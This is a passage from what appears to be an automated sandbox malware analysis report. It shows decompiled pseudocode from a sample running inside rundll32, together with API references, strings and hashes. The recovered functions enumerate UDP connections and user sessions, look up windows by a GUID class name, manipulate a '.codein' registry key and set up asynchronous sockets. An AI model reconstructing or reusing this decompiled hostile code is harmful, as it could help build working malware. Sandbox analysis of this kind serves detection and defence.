                                                            									asm("movups [edi+esi+0x10], xmm0");
                                                            									_t96 = _t93 + 0x20;
                                                            									E0465E060(_t96 + _t101,  &_v540, 2 + lstrlenW( &_v540) * 2);
                                                            									_t116 = _t120 + 0xc;
                                                            									_t75 = lstrlenW( &_v540);
                                                            									_t91 = _v556 + 1;
                                                            									_t85 = _v544 + 0xc;
                                                            									_v556 = _t91;
                                                            									_v544 = _t85;
                                                            									_t93 = _t96 + _t75 * 2 + 2;
                                                            									__eflags = _t91 -  *_v552;
                                                            								} while (_t91 <  *_v552);
                                                            							}
                                                            							LocalReAlloc(_t101, _t93, 0x42);
                                                            							E04655B47(_v552);
                                                            							__eflags = _v16 ^ _t106;
                                                            							return E04655AFE(_v16 ^ _t106, 0x10);
                                                            						} else {
                                                            							_push(0x10);
                                                            							E04655B47(_t100);
                                                            							goto L4;
                                                            						}
                                                            					}
                                                            				}
                                                            			}






































                                                            0x0463d989
                                                            0x0463d990
                                                            0x0463d994
                                                            0x0463d996
                                                            0x0463d99c
                                                            0x0463d9a3
                                                            0x0463d9a6
                                                            0x0463d9a8
                                                            0x0463d9af
                                                            0x0463d9b5
                                                            0x0463d9bb
                                                            0x0463d9c3
                                                            0x0463da2d
                                                            0x0463da41
                                                            0x0463d9c5
                                                            0x0463d9cb
                                                            0x0463d9de
                                                            0x0463d9e6
                                                            0x0463d9ec
                                                            0x0463d9ee
                                                            0x0463d9f1
                                                            0x00000000
                                                            0x0463d9f3
                                                            0x0463d9f3
                                                            0x0463d9f9
                                                            0x0463d9fe
                                                            0x0463da01
                                                            0x0463da09
                                                            0x0463da0f
                                                            0x0463da10
                                                            0x0463da12
                                                            0x0463da14
                                                            0x0463da16
                                                            0x0463da17
                                                            0x0463da20
                                                            0x0463da4f
                                                            0x0463da51
                                                            0x0463da57
                                                            0x0463da5d
                                                            0x0463da5f
                                                            0x0463da65
                                                            0x0463da68
                                                            0x0463da70
                                                            0x0463da79
                                                            0x0463da81
                                                            0x0463da84
                                                            0x0463da85
                                                            0x0463da8b
                                                            0x0463da91
                                                            0x0463da96
                                                            0x0463dab0
                                                            0x0463dab6
                                                            0x0463dabc
                                                            0x0463dac2
                                                            0x0463dac4
                                                            0x0463dad0
                                                            0x0463dad0
                                                            0x0463dad2
                                                            0x0463dae0
                                                            0x0463dae4
                                                            0x0463daeb
                                                            0x0463daf0
                                                            0x0463db0c
                                                            0x0463db11
                                                            0x0463db1b
                                                            0x0463db2d
                                                            0x0463db2e
                                                            0x0463db31
                                                            0x0463db3a
                                                            0x0463db46
                                                            0x0463db49
                                                            0x0463db49
                                                            0x0463da70
                                                            0x0463db55
                                                            0x0463db65
                                                            0x0463db72
                                                            0x0463db81
                                                            0x0463da22
                                                            0x0463da22
                                                            0x0463da25
                                                            0x00000000
                                                            0x0463da2a
                                                            0x0463da20
                                                            0x0463d9f1

                                                            APIs
                                                            • LoadLibraryA.KERNEL32(iphlpapi.dll,00000000), ref: 0463D9BB
                                                            • GetProcAddress.KERNEL32(00000000,GetExtendedUdpTable), ref: 0463D9CB
                                                            • LocalAlloc.KERNEL32(00000040,00002800), ref: 0463DA49
                                                            • lstrlenW.KERNEL32(?), ref: 0463DAA0
                                                            • LocalSize.KERNEL32(00000000), ref: 0463DAB6
                                                            • LocalReAlloc.KERNEL32(00000000,?,00000042), ref: 0463DACA
                                                            • lstrlenW.KERNEL32(?), ref: 0463DAF3
                                                            • lstrlenW.KERNEL32(?), ref: 0463DB1B
                                                            • LocalReAlloc.KERNEL32(00000000,00000000,00000042), ref: 0463DB55
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$Alloclstrlen$AddressLibraryLoadProcSize
                                                            • String ID: GetExtendedUdpTable$iphlpapi.dll
                                                            • API String ID: 2444183403-1809394930
                                                            • Opcode ID: b10eceb98df718918408174b1c493547b0d56be047125fcbf225630a45aabb8f
                                                            • Instruction ID: 2b44c4254863f07c0eb29247f6c8ecebfca52e72a17a1239bd5dbfd68383e016
                                                            • Opcode Fuzzy Hash: b10eceb98df718918408174b1c493547b0d56be047125fcbf225630a45aabb8f
                                                            • Instruction Fuzzy Hash: 37518C71E40218ABDB20DF65DC8DBE9B7B4EF94301F000199E909A7251EB716E84CF95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 43%
                                                            			E046470E0(void* __ebx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				struct _OSVERSIONINFOW _v284;
                                                            				void* _v288;
                                                            				char _v292;
                                                            				_Unknown_base(*)()* _v296;
                                                            				signed int _t26;
                                                            				_Unknown_base(*)()* _t36;
                                                            				struct HINSTANCE__* _t37;
                                                            				_Unknown_base(*)()* _t38;
                                                            				signed int _t43;
                                                            				signed int _t44;
                                                            				intOrPtr* _t50;
                                                            				intOrPtr* _t54;
                                                            				intOrPtr* _t55;
                                                            				intOrPtr _t58;
                                                            				signed int _t60;
                                                            				struct HINSTANCE__* _t62;
                                                            				intOrPtr _t64;
                                                            				signed int _t66;
                                                            
                                                            				_t26 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t26 ^ _t66;
                                                            				_t60 = 0;
                                                            				E0465DEA0(0,  &_v284, 0, 0x114);
                                                            				_v284.dwOSVersionInfoSize = 0x114;
                                                            				GetVersionExW( &_v284);
                                                            				if(_v284.dwMajorVersion < 6) {
                                                            					L24:
                                                            					return E04655AFE(_v8 ^ _t66);
                                                            				} else {
                                                            					_t62 = LoadLibraryA("Wtsapi32.dll");
                                                            					if(_t62 != 0) {
                                                            						_t50 = GetProcAddress(_t62, "WTSEnumerateSessionsW");
                                                            						_t36 = GetProcAddress(_t62, "WTSFreeMemory");
                                                            						_v296 = _t36;
                                                            						if(_t50 == 0 || _t36 == 0) {
                                                            							L20:
                                                            							_t37 = LoadLibraryA("Kernel32.dll");
                                                            							if(_t37 != 0) {
                                                            								_t38 = GetProcAddress(_t37, "WTSGetActiveConsoleSessionId");
                                                            								if(_t38 != 0) {
                                                            									_t60 =  *_t38();
                                                            								}
                                                            							}
                                                            						} else {
                                                            							_v292 = 0;
                                                            							_push( &_v288);
                                                            							_v288 = 0;
                                                            							_push( &_v292);
                                                            							_push(1);
                                                            							_push(0);
                                                            							_push(0);
                                                            							if( *_t50() == 0) {
                                                            								goto L20;
                                                            							} else {
                                                            								_t58 = _v288;
                                                            								_t43 = 0;
                                                            								_t64 = _v292;
                                                            								if(_t58 == 0) {
                                                            									L12:
                                                            									_t44 = 0;
                                                            									if(_t58 != 0) {
                                                            										_t54 = _t64 + 8;
                                                            										while( *_t54 != 1) {
                                                            											_t44 = _t44 + 1;
                                                            											_t54 = _t54 + 0xc;
                                                            											if(_t44 < _t58) {
                                                            												continue;
                                                            											} else {
                                                            											}
                                                            											goto L18;
                                                            										}
                                                            										_t60 =  *((intOrPtr*)(_t64 + (_t44 + _t44 * 2) * 4));
                                                            									}
                                                            								} else {
                                                            									_t55 = _t64 + 8;
                                                            									while( *_t55 != _t60) {
                                                            										_t43 = _t43 + 1;
                                                            										_t55 = _t55 + 0xc;
                                                            										if(_t43 < _t58) {
                                                            											continue;
                                                            										} else {
                                                            											goto L12;
                                                            										}
                                                            										goto L18;
                                                            									}
                                                            									_t60 =  *((intOrPtr*)(_t64 + (_t43 + _t43 * 2) * 4));
                                                            									if(_t60 == 0) {
                                                            										goto L12;
                                                            									}
                                                            								}
                                                            								L18:
                                                            								_v296(_t64);
                                                            								if(_t60 == 0) {
                                                            									goto L20;
                                                            								}
                                                            							}
                                                            						}
                                                            						goto L24;
                                                            					} else {
                                                            						return E04655AFE(_v8 ^ _t66);
                                                            					}
                                                            				}
                                                            			}






















                                                            0x046470e9
                                                            0x046470f0
                                                            0x046470fa
                                                            0x04647104
                                                            0x0464710c
                                                            0x0464711d
                                                            0x0464712a
                                                            0x04647227
                                                            0x04647238
                                                            0x04647130
                                                            0x0464713b
                                                            0x0464713f
                                                            0x0464716a
                                                            0x0464716c
                                                            0x0464716e
                                                            0x04647176
                                                            0x04647207
                                                            0x0464720c
                                                            0x04647214
                                                            0x0464721c
                                                            0x04647220
                                                            0x04647224
                                                            0x04647224
                                                            0x04647220
                                                            0x04647184
                                                            0x0464718a
                                                            0x04647190
                                                            0x04647197
                                                            0x0464719d
                                                            0x0464719e
                                                            0x046471a0
                                                            0x046471a2
                                                            0x046471a8
                                                            0x00000000
                                                            0x046471aa
                                                            0x046471aa
                                                            0x046471b0
                                                            0x046471b2
                                                            0x046471ba
                                                            0x046471d8
                                                            0x046471d8
                                                            0x046471dc
                                                            0x046471de
                                                            0x046471e1
                                                            0x046471e6
                                                            0x046471e7
                                                            0x046471ec
                                                            0x00000000
                                                            0x00000000
                                                            0x046471ee
                                                            0x00000000
                                                            0x046471ec
                                                            0x046471f3
                                                            0x046471f3
                                                            0x046471bc
                                                            0x046471bc
                                                            0x046471c0
                                                            0x046471c4
                                                            0x046471c5
                                                            0x046471ca
                                                            0x00000000
                                                            0x046471cc
                                                            0x00000000
                                                            0x046471cc
                                                            0x00000000
                                                            0x046471ca
                                                            0x046471d1
                                                            0x046471d6
                                                            0x00000000
                                                            0x00000000
                                                            0x046471d6
                                                            0x046471f6
                                                            0x046471f7
                                                            0x046471ff
                                                            0x00000000
                                                            0x04647201
                                                            0x046471ff
                                                            0x046471a8
                                                            0x00000000
                                                            0x04647143
                                                            0x04647150
                                                            0x04647150
                                                            0x0464713f

                                                            APIs
                                                            • GetVersionExW.KERNEL32(00000114,?,00000104,00000000), ref: 0464711D
                                                            • LoadLibraryA.KERNEL32(Wtsapi32.dll,?,00000104,00000000), ref: 04647135
                                                            • GetProcAddress.KERNEL32(00000000,WTSEnumerateSessionsW), ref: 04647158
                                                            • GetProcAddress.KERNEL32(00000000,WTSFreeMemory), ref: 0464716C
                                                            • LoadLibraryA.KERNEL32(Kernel32.dll,?,00000104,00000000), ref: 0464720C
                                                            • GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 0464721C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad$Version
                                                            • String ID: Kernel32.dll$WTSEnumerateSessionsW$WTSFreeMemory$WTSGetActiveConsoleSessionId$Wtsapi32.dll
                                                            • API String ID: 158333003-4205620339
                                                            • Opcode ID: 09644f545ae3a927d97650bd52d0b14faa892dbf836a65258e717334d4220174
                                                            • Instruction ID: 951de69c9f7f31422a13a17d2f0c9590d65a11a9492baa840c0fad83c02c9f0e
                                                            • Opcode Fuzzy Hash: 09644f545ae3a927d97650bd52d0b14faa892dbf836a65258e717334d4220174
                                                            • Instruction Fuzzy Hash: 73319331A002199BDF29DA65DC49AEA73B9EBD9711F1404A9EA09D7240FF30FA45CE50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E046451C0(void* __ebx, void* __edi, void* __esi, struct HWND__* _a4, void** _a8) {
                                                            				signed int _v8;
                                                            				char _v1032;
                                                            				char _v2056;
                                                            				struct HWND__* _v2060;
                                                            				void** _v2064;
                                                            				signed int _t20;
                                                            				void** _t22;
                                                            				signed int _t33;
                                                            				signed int _t34;
                                                            				int _t44;
                                                            				void* _t50;
                                                            				char* _t53;
                                                            				void* _t56;
                                                            				intOrPtr _t57;
                                                            				void* _t58;
                                                            				void* _t59;
                                                            				CHAR* _t61;
                                                            				struct HWND__* _t63;
                                                            				int _t64;
                                                            				DWORD* _t65;
                                                            				signed int _t66;
                                                            
                                                            				_t58 = __edi;
                                                            				_t20 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t20 ^ _t66;
                                                            				_t22 = _a8;
                                                            				_t63 = _a4;
                                                            				_t50 =  *_t22;
                                                            				_v2064 = _t22;
                                                            				_v2060 = _t63;
                                                            				E0465DEA0(__edi,  &_v2056, 0, 0x400);
                                                            				E0465DEA0(_t58,  &_v1032, 0, 0x400);
                                                            				GetClassNameA(_t63,  &_v1032, 0x3ff);
                                                            				if(lstrlenA( &_v1032) == 0) {
                                                            					L14:
                                                            					return E04655AFE(_v8 ^ _t66);
                                                            				}
                                                            				_t53 = "5B3838F5-0C81-46D9-A4C0-6EA28CA3E942";
                                                            				_t33 =  &_v1032;
                                                            				while(1) {
                                                            					_t56 =  *_t33;
                                                            					if(_t56 !=  *_t53) {
                                                            						break;
                                                            					}
                                                            					if(_t56 == 0) {
                                                            						L6:
                                                            						_t34 = 0;
                                                            						L8:
                                                            						if(_t34 == 0) {
                                                            							_push(_t58);
                                                            							GetWindowTextA(_t63,  &_v2056, 0x3ff);
                                                            							_t59 = E0465DA60( &_v2056, 0x5f);
                                                            							if(_t59 != 0) {
                                                            								_t61 = _t59 + 1;
                                                            								if(_t50 == 0) {
                                                            									_t50 = LocalAlloc(0x40, 1);
                                                            								}
                                                            								_t64 = LocalSize(_t50);
                                                            								_t15 = lstrlenA(_t61) + 5; // 0x5
                                                            								_t50 = LocalReAlloc(_t50, _t15 + _t64, 0x42);
                                                            								_t65 = _t64 + _t50;
                                                            								GetWindowThreadProcessId(_v2060, _t65);
                                                            								_t44 = lstrlenA(_t61);
                                                            								_t17 =  &(_t65[1]); // 0x4
                                                            								E0465E060(_t17, _t61, _t44 + 1);
                                                            							}
                                                            							 *_v2064 = _t50;
                                                            						}
                                                            						goto L14;
                                                            					}
                                                            					_t57 =  *((intOrPtr*)(_t33 + 1));
                                                            					if(_t57 != _t53[1]) {
                                                            						break;
                                                            					}
                                                            					_t33 = _t33 + 2;
                                                            					_t53 =  &(_t53[2]);
                                                            					if(_t57 != 0) {
                                                            						continue;
                                                            					}
                                                            					goto L6;
                                                            				}
                                                            				asm("sbb eax, eax");
                                                            				_t34 = _t33 | 0x00000001;
                                                            				goto L8;
                                                            			}
























                                                            0x046451c0
                                                            0x046451c9
                                                            0x046451d0
                                                            0x046451d3
                                                            0x046451d8
                                                            0x046451db
                                                            0x046451e2
                                                            0x046451f1
                                                            0x046451f7
                                                            0x0464520a
                                                            0x0464521f
                                                            0x04645234
                                                            0x046452fd
                                                            0x0464530e
                                                            0x0464530e
                                                            0x0464523a
                                                            0x0464523f
                                                            0x04645245
                                                            0x04645245
                                                            0x04645249
                                                            0x00000000
                                                            0x00000000
                                                            0x0464524d
                                                            0x04645261
                                                            0x04645261
                                                            0x0464526a
                                                            0x0464526c
                                                            0x04645272
                                                            0x04645280
                                                            0x04645294
                                                            0x0464529b
                                                            0x0464529d
                                                            0x046452a0
                                                            0x046452ac
                                                            0x046452ac
                                                            0x046452b6
                                                            0x046452c0
                                                            0x046452cd
                                                            0x046452cf
                                                            0x046452d8
                                                            0x046452df
                                                            0x046452e7
                                                            0x046452ec
                                                            0x046452f1
                                                            0x046452fb
                                                            0x046452fb
                                                            0x00000000
                                                            0x0464526c
                                                            0x0464524f
                                                            0x04645255
                                                            0x00000000
                                                            0x00000000
                                                            0x04645257
                                                            0x0464525a
                                                            0x0464525f
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0464525f
                                                            0x04645265
                                                            0x04645267
                                                            0x00000000

                                                            APIs
                                                            • GetClassNameA.USER32(?,?,000003FF), ref: 0464521F
                                                            • lstrlen.KERNEL32(?), ref: 0464522C
                                                            • GetWindowTextA.USER32(?,?,000003FF), ref: 04645280
                                                            • _strrchr.LIBCMT ref: 0464528F
                                                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 046452A6
                                                            • LocalSize.KERNEL32 ref: 046452AF
                                                            • lstrlen.KERNEL32(00000001), ref: 046452B8
                                                            • LocalReAlloc.KERNEL32(?,00000005,00000042), ref: 046452C7
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 046452D8
                                                            • lstrlen.KERNEL32(00000001,?,00000005,00000042), ref: 046452DF
                                                            Strings
                                                            • 5B3838F5-0C81-46D9-A4C0-6EA28CA3E942, xrefs: 0464523A
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Locallstrlen$AllocWindow$ClassNameProcessSizeTextThread_strrchr
                                                            • String ID: 5B3838F5-0C81-46D9-A4C0-6EA28CA3E942
                                                            • API String ID: 414574500-3141347713
                                                            • Opcode ID: d6bd6197ee46f098211ff43085ca1d823afe95a7673ff5f473e05b0be16aacb3
                                                            • Instruction ID: d2072ca9a218172ceeb7334b4079ac2bac714edf3fb8f98d2822d01589b08be5
                                                            • Opcode Fuzzy Hash: d6bd6197ee46f098211ff43085ca1d823afe95a7673ff5f473e05b0be16aacb3
                                                            • Instruction Fuzzy Hash: D331E7B2A00209ABDB109F60DC89FAB77BDEF54700F0450A5EB4AD7241FF35AE458B54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E04636400(void* __ebx, void* __ecx) {
                                                            				void* _v8;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				void* _t17;
                                                            				void* _t20;
                                                            				intOrPtr _t21;
                                                            				intOrPtr _t27;
                                                            				void* _t37;
                                                            				void* _t40;
                                                            
                                                            				_t45 =  *0x46878d0;
                                                            				_t40 = __ecx;
                                                            				if( *0x46878d0 == 0) {
                                                            					 *0x46878d0 = E046362B0(__ebx, L04655B14(__ecx, _t45, 0x3c), _t37);
                                                            				}
                                                            				_v8 = 0;
                                                            				if(_t40 == 0) {
                                                            					RegCreateKeyExW(0x80000002, L"SOFTWARE\\Classes\\.codein", 0, 0, 0, 0x104, 0,  &_v8, 0);
                                                            					_t17 = _v8;
                                                            					__eflags = _t17;
                                                            					if(_t17 != 0) {
                                                            						RegCloseKey(_t17);
                                                            					}
                                                            					_v8 = 0;
                                                            					RegCreateKeyExW(0x80000001, L"SOFTWARE\\Classes\\.codein", 0, 0, 0, 0x104, 0,  &_v8, 0);
                                                            					_t20 = _v8;
                                                            					__eflags = _t20;
                                                            					if(_t20 != 0) {
                                                            						RegCloseKey(_t20);
                                                            					}
                                                            					_t21 =  *0x46878d0; // 0x0
                                                            					 *((intOrPtr*)(_t21 + 0x38)) = 1;
                                                            					return _t21;
                                                            				} else {
                                                            					if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Classes\\.codein", 0, 0x20106,  &_v8) == 0) {
                                                            						SHDeleteKeyW(_v8, 0x467c5d0);
                                                            						RegCloseKey(_v8);
                                                            					}
                                                            					_v8 = 0;
                                                            					if(RegOpenKeyExW(0x80000001, L"SOFTWARE\\Classes\\.codein", 0, 0x20106,  &_v8) == 0) {
                                                            						SHDeleteKeyW(_v8, 0x467c5d0);
                                                            						RegCloseKey(_v8);
                                                            					}
                                                            					_t27 =  *0x46878d0; // 0x0
                                                            					 *(_t27 + 0x38) = 0;
                                                            					return _t27;
                                                            				}
                                                            			}












                                                            0x04636406
                                                            0x0463640f
                                                            0x04636411
                                                            0x04636424
                                                            0x04636424
                                                            0x04636429
                                                            0x04636435
                                                            0x046364d5
                                                            0x046364d7
                                                            0x046364e0
                                                            0x046364e2
                                                            0x046364e5
                                                            0x046364e5
                                                            0x046364ec
                                                            0x0463650b
                                                            0x0463650d
                                                            0x04636510
                                                            0x04636512
                                                            0x04636515
                                                            0x04636515
                                                            0x04636517
                                                            0x0463651e
                                                            0x04636528
                                                            0x04636437
                                                            0x0463645d
                                                            0x04636467
                                                            0x0463646c
                                                            0x0463646c
                                                            0x04636471
                                                            0x04636492
                                                            0x0463649c
                                                            0x046364a1
                                                            0x046364a1
                                                            0x046364a3
                                                            0x046364a8
                                                            0x046364b4
                                                            0x046364b4

                                                            APIs
                                                            • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\.codein,00000000,00020106,00000000), ref: 04636449
                                                            • SHDeleteKeyW.SHLWAPI(00000000,0467C5D0), ref: 04636467
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0463646C
                                                            • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Classes\.codein,00000000,00020106,00000000), ref: 0463648A
                                                            • SHDeleteKeyW.SHLWAPI(00000000,0467C5D0), ref: 0463649C
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 046364A1
                                                              • Part of subcall function 046362B0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\.codein,00000000,00020119,0464B6FC,?,04686318,?,?,0464B6FC), ref: 04636360
                                                              • Part of subcall function 046362B0: RegCloseKey.ADVAPI32(0464B6FC,?,04686318,?,?,0464B6FC), ref: 0463636D
                                                            • RegCreateKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\.codein,00000000,00000000,00000000,00000104,00000000,00000000,00000000), ref: 046364D5
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 046364E5
                                                            • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Classes\.codein,00000000,00000000,00000000,00000104,00000000,00000000,00000000), ref: 0463650B
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 04636515
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close$Open$CreateDelete
                                                            • String ID: SOFTWARE\Classes\.codein
                                                            • API String ID: 185900105-3041101089
                                                            • Opcode ID: 987524cfd639fcee699400f62f3db0218d363d7af3b820294be1e10d82825a2e
                                                            • Instruction ID: 47eb3c03fb2c8be3eba807b097aa29e90cadea96bd2bce74c09c660bc695dc7d
                                                            • Opcode Fuzzy Hash: 987524cfd639fcee699400f62f3db0218d363d7af3b820294be1e10d82825a2e
                                                            • Instruction Fuzzy Hash: AA312170B80318FBEB20DB55DD0AF597BA8EB40B15F304065BA04B7291F7B47E10DA59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 34%
                                                            			E04654090(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, char _a4, char _a12, intOrPtr* _a16, intOrPtr _a20) {
                                                            				signed int _v8;
                                                            				char _v12;
                                                            				char _v16;
                                                            				void* _v20;
                                                            				intOrPtr* _v24;
                                                            				intOrPtr* _v28;
                                                            				signed int _v44;
                                                            				char _v48;
                                                            				intOrPtr _v52;
                                                            				intOrPtr _v56;
                                                            				signed int _v68;
                                                            				intOrPtr _v72;
                                                            				char _v76;
                                                            				signed int _t73;
                                                            				void* _t79;
                                                            				long _t85;
                                                            				long _t89;
                                                            				long _t92;
                                                            				signed int _t94;
                                                            				signed int _t103;
                                                            				void* _t104;
                                                            				signed int _t105;
                                                            				long _t106;
                                                            				void* _t115;
                                                            				intOrPtr* _t120;
                                                            				intOrPtr _t121;
                                                            				signed int _t135;
                                                            				intOrPtr* _t139;
                                                            				long _t140;
                                                            				struct _CRITICAL_SECTION* _t144;
                                                            				intOrPtr _t146;
                                                            				intOrPtr _t148;
                                                            				signed int _t149;
                                                            				signed int _t150;
                                                            				signed int _t151;
                                                            
                                                            				_t73 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t73 ^ _t149;
                                                            				_push(__ebx);
                                                            				_push(__esi);
                                                            				_v12 = _a4;
                                                            				_push(__edi);
                                                            				_t139 = __ecx;
                                                            				_v16 = _a12;
                                                            				_v28 = _a16;
                                                            				_v24 = __ecx;
                                                            				_v20 = 0;
                                                            				_t79 = E0464C880(__ecx + 0xb0,  &_v20);
                                                            				_t155 = _t79;
                                                            				if(_t79 != 0) {
                                                            					_t115 = _v20;
                                                            				} else {
                                                            					_t148 =  *((intOrPtr*)(__ecx + 0xa4));
                                                            					_t115 = RtlAllocateHeap( *(__ecx + 0x94), 0, _t148 + 0x38);
                                                            					_v20 = _t115;
                                                            					_t17 = _t115 + 0x38; // 0x38
                                                            					 *(_t115 + 0x14) = _t139 + 0x94;
                                                            					 *((intOrPtr*)(_t115 + 0x24)) = _t148;
                                                            					 *((intOrPtr*)(_t115 + 0x20)) = _t17;
                                                            				}
                                                            				_push(_v16);
                                                            				asm("xorps xmm0, xmm0");
                                                            				_push(_v12);
                                                            				asm("movups [ebx], xmm0");
                                                            				 *(_t115 + 0x10) = 0;
                                                            				 *(_t115 + 0x1c) = 0;
                                                            				 *(_t115 + 0x1c) =  *(_t139 + 0x18);
                                                            				_t140 = E046527F0(_t139, _t155);
                                                            				_t28 = _t140 + 0x54; // 0x54
                                                            				_t144 = _t28;
                                                            				EnterCriticalSection(_t144);
                                                            				_push(_a20);
                                                            				_t120 = _v24;
                                                            				E04652A10(_t120, _t144, _v12, _t140, _v28, _t139);
                                                            				if( *((intOrPtr*)(_v24 + 0x4c)) == 0) {
                                                            					_t120 = _v28;
                                                            					__eflags =  *_t120 - 2;
                                                            					_t85 =  !=  ? 0x1c : 0x10;
                                                            					__imp__#4( *(_t140 + 0x88), _t120, 0x10);
                                                            					__eflags = 0x10 - 0xffffffff;
                                                            					if(0x10 == 0xffffffff) {
                                                            						__imp__#111();
                                                            						goto L15;
                                                            					} else {
                                                            						_t92 =  &_v12;
                                                            						_v12 = 1;
                                                            						__imp__#10( *(_t140 + 0x88), 0x8004667e, _t92);
                                                            						__eflags = _t92;
                                                            						if(_t92 != 0) {
                                                            							goto L22;
                                                            						} else {
                                                            							_t103 = CreateIoCompletionPort( *(_t140 + 0x88),  *(_v24 + 0x50), _t140, _t92);
                                                            							__eflags = _t103;
                                                            							if(_t103 == 0) {
                                                            								goto L7;
                                                            							} else {
                                                            								 *((intOrPtr*)(_t140 + 0x48)) = 1;
                                                            								_t104 = E046520F0(_v24, _t140);
                                                            								__eflags = _t104 - 2;
                                                            								if(_t104 == 2) {
                                                            									_t105 = GetLastError();
                                                            									__eflags = _t105;
                                                            									_t85 =  ==  ? 0x4c7 : _t105;
                                                            									goto L15;
                                                            								} else {
                                                            									_t85 = E04653AC0(_t115, _v24, _t140, _t144, _t140, _t115);
                                                            									_t121 = 0;
                                                            								}
                                                            							}
                                                            							goto L16;
                                                            						}
                                                            					}
                                                            				} else {
                                                            					_t106 =  &_v16;
                                                            					_v16 = 1;
                                                            					__imp__#10( *(_t140 + 0x88), 0x8004667e, _t106);
                                                            					if(_t106 != 0) {
                                                            						_push(0x80004005);
                                                            						E04637AC0();
                                                            						L22:
                                                            						E04637AC0();
                                                            						asm("int3");
                                                            						asm("int3");
                                                            						asm("int3");
                                                            						asm("int3");
                                                            						asm("int3");
                                                            						asm("int3");
                                                            						asm("int3");
                                                            						asm("int3");
                                                            						_t150 = _t151;
                                                            						_t94 =  *0x4684008; // 0xd355be4e
                                                            						_v68 = _t94 ^ _t150;
                                                            						_t135 = _v44;
                                                            						__eflags = _t135;
                                                            						_t146 = _v52;
                                                            						_v76 = _v48;
                                                            						_t98 =  ==  ? _t146 : _t146 + _t135;
                                                            						_v72 =  ==  ? _t146 : _t146 + _t135;
                                                            						 *((intOrPtr*)( *_t120 + 8))( &_v76, 1, _t144, _t149, 0x80004005);
                                                            						__eflags = _v68 ^ _t150;
                                                            						return E04655AFE(_v68 ^ _t150, _v56);
                                                            					} else {
                                                            						if(CreateIoCompletionPort( *(_t140 + 0x88),  *(_v24 + 0x50), _t140, _t106) == 0) {
                                                            							L7:
                                                            							_t85 = GetLastError();
                                                            						} else {
                                                            							_t85 = E0464D560( *((intOrPtr*)(_v24 + 0x40)),  *(_t140 + 0x88), _v28, _t115);
                                                            						}
                                                            						L15:
                                                            						_t121 = 1;
                                                            						L16:
                                                            						_v20 = _t85;
                                                            						if(_t85 != 0 && _t121 != 0) {
                                                            							E04652920(_v24, _t140, 0, 0, 0);
                                                            							_t89 = E0464C930(_v24 + 0xb0, _t115);
                                                            							if(_t89 == 0) {
                                                            								HeapFree( *( *(_t115 + 0x14)), _t89, _t115);
                                                            							}
                                                            						}
                                                            						LeaveCriticalSection(_t144);
                                                            						return E04655AFE(_v8 ^ _t149);
                                                            					}
                                                            				}
                                                            			}






































                                                            0x04654096
                                                            0x0465409d
                                                            0x046540a3
                                                            0x046540a4
                                                            0x046540a5
                                                            0x046540ab
                                                            0x046540ac
                                                            0x046540ae
                                                            0x046540b4
                                                            0x046540c1
                                                            0x046540c4
                                                            0x046540cb
                                                            0x046540d0
                                                            0x046540d2
                                                            0x04654105
                                                            0x046540d4
                                                            0x046540d4
                                                            0x046540ec
                                                            0x046540f4
                                                            0x046540f7
                                                            0x046540fa
                                                            0x046540fd
                                                            0x04654100
                                                            0x04654100
                                                            0x04654108
                                                            0x0465410b
                                                            0x04654110
                                                            0x04654113
                                                            0x04654116
                                                            0x0465411d
                                                            0x04654127
                                                            0x0465412f
